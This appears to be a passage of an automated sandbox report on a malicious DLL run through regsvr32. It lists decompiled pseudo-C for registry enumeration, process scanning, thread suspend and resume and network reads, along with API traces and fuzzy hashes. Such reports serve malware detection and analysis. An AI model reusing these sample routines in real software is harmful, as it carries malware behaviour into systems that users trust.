                								if( *0x31fa2b4 <= 6) {
                									_t42 =  *0x31fa2d8; // 0x240d5a8
                									_t15 = _t42 + 0x31fbdc2; // 0x52384549
                									E031F36C5(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                								}
                							}
                							_t38 =  *0x31fa2d8; // 0x240d5a8
                							_t17 = _t38 + 0x31fbe70; // 0x5609418
                							_t18 = _t38 + 0x31fbe48; // 0x680043
                							_t45 = E031F2BC9(_v8, 0x80000001, _t52, _t18, _t17);
                							HeapFree( *0x31fa290, 0, _t52);
                						}
                					}
                					HeapFree( *0x31fa290, 0, _v16);
                				}
                				_t54 = _v8;
                				if(_v8 != 0) {
                					E031F73B2(_t54);
                				}
                				return _t45;
                			}

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,056093E0,00000000,?,74E5F710,00000000,74E5F730), ref: 031F5D45
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05609418,?,00000000,30314549,00000014,004F0053,056093D4), ref: 031F5DE2
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031F54C0), ref: 031F5DF4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: 4c32a1ebb27ad7adfc2d099c5a5a319a3af6481ae8d7d51d6d9c534252a7c6b2
                • Instruction ID: 19c48d46b8224298e603f82d4bcc0105a3e79a1d00ce647d15306716490237b0
                • Opcode Fuzzy Hash: 4c32a1ebb27ad7adfc2d099c5a5a319a3af6481ae8d7d51d6d9c534252a7c6b2
                • Instruction Fuzzy Hash: 1F31E236A00208BFDB15EBA4DC88EDA7BBDFF0D704F184155EB049B121D771AA55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 04BDB0B2
                • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 04BDB13C
                • WaitForSingleObject.KERNEL32(00000064), ref: 04BDB14A
                • SuspendThread.KERNELBASE(?), ref: 04BDB15D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                • String ID:
                • API String ID: 3168247402-0
                • Opcode ID: fa3a224281e590b7b744c1bc93332e83da3b5fd9f3602c0b9b747d8607dcdb1d
                • Instruction ID: 2bf2d15c551f49483ecc8e3ca7cb2cd0c19c9cbc521e57485a67e90f8f992357
                • Opcode Fuzzy Hash: fa3a224281e590b7b744c1bc93332e83da3b5fd9f3602c0b9b747d8607dcdb1d
                • Instruction Fuzzy Hash: CD415F71108301AFE721EF65CC80E6BBBE9FF88354F00496DFA9592164E731F9648B62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E031F2711(void* __eax) {
                				long _v8;
                				char _v12;
                				char _v16;
                				intOrPtr _v20;
                				void* _v24;
                				void* __esi;
                				char* _t40;
                				long _t41;
                				void* _t44;
                				intOrPtr _t45;
                				intOrPtr* _t46;
                				char _t48;
                				long _t52;
                				char* _t53;
                				long _t54;
                				intOrPtr* _t55;
                				void* _t64;
                
                				_t64 = __eax;
                				_t40 =  &_v12;
                				_v8 = 0;
                				_v16 = 0;
                				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
                				if(_t40 == 0) {
                					_t41 = GetLastError();
                					_v8 = _t41;
                					if(_t41 != 0x2efe) {
                						L26:
                						return _v8;
                					}
                					_v8 = 0;
                					L25:
                					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                					goto L26;
                				}
                				if(_v12 == 0) {
                					goto L25;
                				}
                				_t44 =  *0x31fa144(0, 1,  &_v24); // executed
                				if(_t44 != 0) {
                					_v8 = 8;
                					goto L26;
                				}
                				_t45 = E031F2114(0x1000);
                				_v20 = _t45;
                				if(_t45 == 0) {
                					_v8 = 8;
                					L21:
                					_t46 = _v24;
                					 *((intOrPtr*)( *_t46 + 8))(_t46);
                					goto L26;
                				} else {
                					goto L4;
                				}
                				do {
                					while(1) {
                						L4:
                						_t48 = _v12;
                						if(_t48 >= 0x1000) {
                							_t48 = 0x1000;
                						}
                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                						if(_t48 == 0) {
                							break;
                						}
                						_t55 = _v24;
                						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                						_t17 =  &_v12;
                						 *_t17 = _v12 - _v16;
                						if( *_t17 != 0) {
                							continue;
                						}
                						L10:
                						if(WaitForSingleObject( *0x31fa2c4, 0) != 0x102) {
                							_v8 = 0x102;
                							L18:
                							E031F2C11(_v20);
                							if(_v8 == 0) {
                								_t52 = E031F4E7A(_v24, _t64); // executed
                								_v8 = _t52;
                							}
                							goto L21;
                						}
                						_t53 =  &_v12;
                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
                						if(_t53 != 0) {
                							goto L15;
                						}
                						_t54 = GetLastError();
                						_v8 = _t54;
                						if(_t54 != 0x2f78 || _v12 != 0) {
                							goto L18;
                						} else {
                							_v8 = 0;
                							goto L15;
                						}
                					}
                					_v8 = GetLastError();
                					goto L10;
                					L15:
                				} while (_v12 != 0);
                				goto L18;
                			}

                APIs
                • GetLastError.KERNEL32 ref: 031F2831
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetLastError.KERNEL32 ref: 031F27A5
                • WaitForSingleObject.KERNEL32(00000000), ref: 031F27B5
                • GetLastError.KERNEL32 ref: 031F27D5
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                • String ID:
                • API String ID: 35602742-0
                • Opcode ID: 7b02951426657e0c6798da6228ea64545315c250c25559e00e11dc26ceff5a6a
                • Instruction ID: fd56380930bb2ccbff10fadaff3fb1f05e71594c081f4d951edda2bcb6edd4e9
                • Opcode Fuzzy Hash: 7b02951426657e0c6798da6228ea64545315c250c25559e00e11dc26ceff5a6a
                • Instruction Fuzzy Hash: CC410CB8D00209EFDF14EF94C9849ADBBB8FF0C344B2449A9E602E7150D7309A86DB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F1900(void* __ecx, intOrPtr _a4) {
                				int* _v8;
                				int _v12;
                				int* _v16;
                				int _v20;
                				int* _v24;
                				char* _v28;
                				void* _v32;
                				long _t33;
                				char* _t35;
                				long _t39;
                				long _t42;
                				intOrPtr _t47;
                				void* _t51;
                				long _t53;
                
                				_t51 = __ecx;
                				_v8 = 0;
                				_v16 = 0;
                				_v12 = 0;
                				_v24 = 0;
                				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                				_t53 = _t33;
                				if(_t53 != 0) {
                					L18:
                					return _t53;
                				}
                				_t53 = 8;
                				_t35 = E031F2114(0x104);
                				_v28 = _t35;
                				if(_t35 == 0) {
                					L17:
                					RegCloseKey(_v32);
                					goto L18;
                				}
                				_v20 = 0x104;
                				do {
                					_v16 = _v20;
                					_v12 = 0x104;
                					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                					_t53 = _t39;
                					if(_t53 != 0xea) {
                						if(_t53 != 0) {
                							L14:
                							if(_t53 == 0x103) {
                								_t53 = 0;
                							}
                							L16:
                							E031F2C11(_v28);
                							goto L17;
                						}
                						_t42 = E031F1B78(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                						_t53 = _t42;
                						if(_t53 != 0) {
                							goto L14;
                						}
                						goto L12;
                					}
                					if(_v12 <= 0x104) {
                						if(_v16 <= _v20) {
                							goto L16;
                						}
                						E031F2C11(_v24);
                						_v20 = _v16;
                						_t47 = E031F2114(_v16);
                						_v24 = _t47;
                						if(_t47 != 0) {
                							L6:
                							_t53 = 0;
                							goto L12;
                						}
                						_t53 = 8;
                						goto L16;
                					}
                					_v8 = _v8 + 1;
                					goto L6;
                					L12:
                				} while (WaitForSingleObject( *0x31fa2c4, 0) == 0x102);
                				goto L16;
                			}

                APIs
                • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1926
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • RegEnumKeyExA.KERNELBASE(?,?,?,031F61AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,031F61AC), ref: 031F196D
                • WaitForSingleObject.KERNEL32(00000000,?,?,?,031F61AC,?,031F61AC,?,?,?,?,?,031F61AC,?), ref: 031F19DA
                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1A02
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                • String ID:
                • API String ID: 3664505660-0
                • Opcode ID: cf2da1fd35915f6f179c347d06e38e256801fec147e1c3b2a178a5127190cdca
                • Instruction ID: f60d01f5d87dfec6c8301e9c4bfc66c47de10996a1e7b311f72fc111eb67f7bb
                • Opcode Fuzzy Hash: cf2da1fd35915f6f179c347d06e38e256801fec147e1c3b2a178a5127190cdca
                • Instruction Fuzzy Hash: 85311876C00219FFCF21EB99D8459EEFBBDFB88710F144166EA15B2150D3744A91DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 031F2C84
                • SysAllocString.OLEAUT32(031F1C26), ref: 031F2CC7
                • SysFreeString.OLEAUT32(00000000), ref: 031F2CDB
                • SysFreeString.OLEAUT32(00000000), ref: 031F2CE9
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 0e12d637cc0021e89564df73163a693e0a5c987a423cf671a99ed3a849ccced7
                • Instruction ID: 852a81fcb7dfef383a32edd68a9bd813b0a5715f3df90a40b73740bea778dbfb
                • Opcode Fuzzy Hash: 0e12d637cc0021e89564df73163a693e0a5c987a423cf671a99ed3a849ccced7
                • Instruction Fuzzy Hash: A9311D75900149EFCB05DF98D8D48AEBBB9FF4C344B24842EFA0A97210D7759686CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 41%
                			E031F611C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                				intOrPtr _v12;
                				void* _v16;
                				void* _v28;
                				char _v32;
                				void* __esi;
                				void* _t20;
                				void* _t26;
                				void* _t29;
                				void* _t38;
                				signed int* _t39;
                				void* _t40;
                
                				_t36 = __ecx;
                				_v32 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v12 = _a4;
                				_t20 = E031F2031(__ecx,  &_v32); // executed
                				_t38 = _t20;
                				if(_t38 != 0) {
                					L12:
                					_t39 = _a8;
                					L13:
                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                						_t23 =  &(_t39[1]);
                						if(_t39[1] != 0) {
                							E031F5E26(_t23);
                						}
                					}
                					return _t38;
                				}
                				_t26 = E031F3B1B(0x40,  &_v16); // executed
                				if(_t26 != 0) {
                					_v16 = 0;
                				}
                				_t40 = CreateEventA(0x31fa304, 1, 0,  *0x31fa3a4);
                				if(_t40 != 0) {
                					SetEvent(_t40);
                					Sleep(0xbb8);
                					CloseHandle(_t40);
                				}
                				_push( &_v32);
                				if(_a12 == 0) {
                					_t29 = E031F1900(_t36); // executed
                				} else {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_t29 = E031F1B78(_t36);
                				}
                				_t41 = _v16;
                				_t38 = _t29;
                				if(_v16 != 0) {
                					E031F73B2(_t41);
                				}
                				if(_t38 != 0) {
                					goto L12;
                				} else {
                					_t39 = _a8;
                					_t38 = E031F57E8( &_v32, _t39);
                					goto L13;
                				}
                			}

                APIs
                • CreateEventA.KERNEL32(031FA304,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 031F616D
                • SetEvent.KERNEL32(00000000), ref: 031F617A
                • Sleep.KERNEL32(00000BB8), ref: 031F6185
                • CloseHandle.KERNEL32(00000000), ref: 031F618C
                  • Part of subcall function 031F1900: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1926
                  • Part of subcall function 031F1900: RegEnumKeyExA.KERNELBASE(?,?,?,031F61AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,031F61AC), ref: 031F196D
                  • Part of subcall function 031F1900: WaitForSingleObject.KERNEL32(00000000,?,?,?,031F61AC,?,031F61AC,?,?,?,?,?,031F61AC,?), ref: 031F19DA
                  • Part of subcall function 031F1900: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1A02
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                • String ID:
                • API String ID: 891522397-0
                • Opcode ID: 131b9d0cf0ee8852fb54281f4d6ef80c22f6c1f776ae029674e40edbcabec476
                • Instruction ID: d486b3441fe97b7b9a7f3891690fc36aa593559efae4c1a1c029a939e8e02064
                • Opcode Fuzzy Hash: 131b9d0cf0ee8852fb54281f4d6ef80c22f6c1f776ae029674e40edbcabec476
                • Instruction Fuzzy Hash: 10216276904219AFCB10FFE488849EEB7BDEF8C250B094525EB55EB101D734D985CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F55E9(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                				long _t26;
                				intOrPtr* _t38;
                				char* _t42;
                				long _t43;
                
                				if(_a4 == 0) {
                					L2:
                					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                					_t43 = _t26;
                					if(_t43 == 0) {
                						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                						if(_a4 == 0) {
                							_t43 = 0xe8;
                						} else {
                							_t42 = E031F2114(_a4);
                							if(_t42 == 0) {
                								_t43 = 8;
                							} else {
                								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                								if(_t43 != 0) {
                									E031F2C11(_t42);
                								} else {
                									 *_a20 = _t42;
                									_t38 = _a24;
                									if(_t38 != 0) {
                										 *_t38 = _a4;
                									}
                								}
                							}
                						}
                						RegCloseKey(_a12);
                					}
                					L12:
                					return _t43;
                				}
                				_t43 = E031F1863(_a4, _a8, _a12, _a16, _a20, _a24);
                				if(_t43 == 0) {
                					goto L12;
                				}
                				goto L2;
                			}

                APIs
                • RegOpenKeyW.ADVAPI32(80000002,05609BFE,05609BFE), ref: 031F5622
                • RegQueryValueExW.KERNELBASE(05609BFE,?,00000000,80000002,00000000,00000000,?,031F1C57,3D031F90,80000002,031F61AC,00000000,031F61AC,?,05609BFE,80000002), ref: 031F5644
                • RegQueryValueExW.ADVAPI32(05609BFE,?,00000000,80000002,00000000,00000000,00000000,?,031F1C57,3D031F90,80000002,031F61AC,00000000,031F61AC,?,05609BFE), ref: 031F5669
                • RegCloseKey.ADVAPI32(05609BFE,?,031F1C57,3D031F90,80000002,031F61AC,00000000,031F61AC,?,05609BFE,80000002,00000000,?), ref: 031F5699
                  • Part of subcall function 031F1863: SafeArrayDestroy.OLEAUT32(00000000), ref: 031F18E8
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                • String ID:
                • API String ID: 486277218-0
                • Opcode ID: bbeb911c9739d5589e538670d8ea1d613dd47e5b8753aab4f97fdd05de82810c
                • Instruction ID: c3457e204088ce58bed4144acf492f95992d3f542e22dce7b631072d12c93e99
                • Opcode Fuzzy Hash: bbeb911c9739d5589e538670d8ea1d613dd47e5b8753aab4f97fdd05de82810c
                • Instruction Fuzzy Hash: FA211D7640021DBFDF11EE94DC80CEE7BBAEF0D261B058425FE259B120D7319DA09BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegQueryValueExA.KERNELBASE(04BDE99E,?,00000000,04BDE99E,00000000,04BDE9AE,04BDE99E,?,?,?,?,04BDA359,80000001,?,04BDE99E,04BDE9AE), ref: 04BCFA0F
                • RtlAllocateHeap.NTDLL(00000000,04BDE9AE,00000000), ref: 04BCFA26
                • HeapFree.KERNEL32(00000000,00000000,?,04BDA359,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001,?,04BDE99E), ref: 04BCFA41
                • RegQueryValueExA.KERNELBASE(04BDE99E,?,00000000,04BDE99E,00000000,04BDE9AE,?,04BDA359,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001), ref: 04BCFA60
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateFree
                • String ID:
                • API String ID: 4267586637-0
                • Opcode ID: 372d6d3b77a3457671a08c84df207dc848eecac95f44da7a1779150e64048112
                • Instruction ID: 9700efa0b01dfeea2432940b44b18b3fb7c17eade2a78544b0cf85bc1a7a8f77
                • Opcode Fuzzy Hash: 372d6d3b77a3457671a08c84df207dc848eecac95f44da7a1779150e64048112
                • Instruction Fuzzy Hash: DA11FB76900518FFDB12DF99DC84CEEBBBDEB89650B1040AAF901A7150D271AE41DB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDE5
                • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BEE218,00000000,04BC6559,?,04BC3875,?), ref: 04BCFDF0
                • _wcsupr.NTDLL ref: 04BCFDFD
                • lstrlenW.KERNEL32(00000000), ref: 04BCFE05
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                • String ID:
                • API String ID: 2533608484-0
                • Opcode ID: 7c1dcb64ff3782fbfadfafd96e4a0dbc320121465786098b2f92ca503a426779
                • Instruction ID: 308760c00aa9f0daca9b5d7e43b57c3be075eb139d9c988341712645324b2ded
                • Opcode Fuzzy Hash: 7c1dcb64ff3782fbfadfafd96e4a0dbc320121465786098b2f92ca503a426779
                • Instruction Fuzzy Hash: 2AF0E931201612AFA3227A766CC8E7F576DEFC9B66B100DADF505DB081EF68EC0141B1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E031F2130() {
                				char _v264;
                				void* _v300;
                				void* _t5;
                				int _t8;
                				intOrPtr _t9;
                				int _t15;
                				void* _t17;
                
                				_t15 = 0;
                				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                				_t17 = _t5;
                				if(_t17 != 0) {
                					_t8 = Process32First(_t17,  &_v300);
                					while(_t8 != 0) {
                						_t9 =  *0x31fa2d8; // 0x240d5a8
                						_t2 = _t9 + 0x31fbeb0; // 0x73617661
                						_push( &_v264);
                						if( *0x31fa118() != 0) {
                							_t15 = 1;
                						} else {
                							_t8 = Process32Next(_t17,  &_v300);
                							continue;
                						}
                						L7:
                						CloseHandle(_t17);
                						goto L8;
                					}
                					goto L7;
                				}
                				L8:
                				return _t15;
                			}

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 031F2140
                • Process32First.KERNEL32(00000000,?), ref: 031F2153
                • Process32Next.KERNEL32(00000000,?), ref: 031F217F
                • CloseHandle.KERNEL32(00000000), ref: 031F218E
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: fb8c7103d154420057f7b61058c8138c0d6ec1a7a552ac91fc613048d65cd63e
                • Instruction ID: 21d857ceb796bc6ac5cd1b47b100d6edab424bc3043dcf988fe656a352b1b40b
                • Opcode Fuzzy Hash: fb8c7103d154420057f7b61058c8138c0d6ec1a7a552ac91fc613048d65cd63e
                • Instruction Fuzzy Hash: 62F02B3A2041186FC724F6258C48EEB736CEFCD350F050591EB15C6000EB74D69B8AB4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BE3A54
                  • Part of subcall function 04BD87CD: RtlEnterCriticalSection.NTDLL(00000000), ref: 04BD87D9
                  • Part of subcall function 04BD87CD: CloseHandle.KERNEL32(?), ref: 04BD87E7
                  • Part of subcall function 04BD87CD: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BD8803
                • CloseHandle.KERNEL32(?), ref: 04BE3A62
                • InterlockedDecrement.KERNEL32(04BEE0DC), ref: 04BE3A71
                  • Part of subcall function 04BCE024: SetEvent.KERNEL32(0000053C,04BE3A8C), ref: 04BCE02E
                  • Part of subcall function 04BCE024: CloseHandle.KERNEL32(0000053C), ref: 04BCE043
                  • Part of subcall function 04BCE024: HeapDestroy.KERNELBASE(05E50000), ref: 04BCE053
                • RtlExitUserThread.NTDLL(00000000), ref: 04BE3A8D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                • String ID:
                • API String ID: 1141245775-0
                • Opcode ID: 2bf2bf779cfc1a480c6e44682ed833422c00886e092dd5aa6d5991518c94b1f3
                • Instruction ID: d52c784351b81cb82eb38a3a1551d1fb515eabae15f9139014d336e686f8d10b
                • Opcode Fuzzy Hash: 2bf2bf779cfc1a480c6e44682ed833422c00886e092dd5aa6d5991518c94b1f3
                • Instruction Fuzzy Hash: ADF04435540604ABE7056F7A9809A6E3BB8EFC5731F100299F525AB2C1DB74ED018BB1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F36C5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                				struct _FILETIME _v12;
                				void* _t11;
                				void* _t15;
                				void* _t20;
                				void* _t22;
                				void* _t23;
                				signed short* _t24;
                
                				_t22 = __edx;
                				_t23 = E031F23CC(_t11, _a12);
                				if(_t23 == 0) {
                					_t20 = 8;
                				} else {
                					_t24 = _t23 + _a16 * 2;
                					 *_t24 =  *_t24 & 0x00000000; // executed
                					_t15 = E031F6302(__ecx, _a4, _a8, _t23); // executed
                					_t20 = _t15;
                					if(_t20 == 0) {
                						GetSystemTimeAsFileTime( &_v12);
                						 *_t24 = 0x5f;
                						_t20 = E031F5173(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                					}
                					HeapFree( *0x31fa290, 0, _t23);
                				}
                				return _t20;
                			}

                APIs
                  • Part of subcall function 031F23CC: lstrlen.KERNEL32(?,00000000,05609B30,00000000,031F3413,05609D0E,69B25F44,?,?,?,?,69B25F44,00000005,031FA010,4D283A53,?), ref: 031F23D3
                  • Part of subcall function 031F23CC: mbstowcs.NTDLL ref: 031F23FC
                  • Part of subcall function 031F23CC: memset.NTDLL ref: 031F240E
                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,056093D4), ref: 031F36FC
                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,056093D4), ref: 031F3729
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                • String ID: Ut
                • API String ID: 1500278894-8415677
                • Opcode ID: 2be944133dcec72a93e528b9ec7221ebb38e96dcd150b0ff15b071b3e50e1918
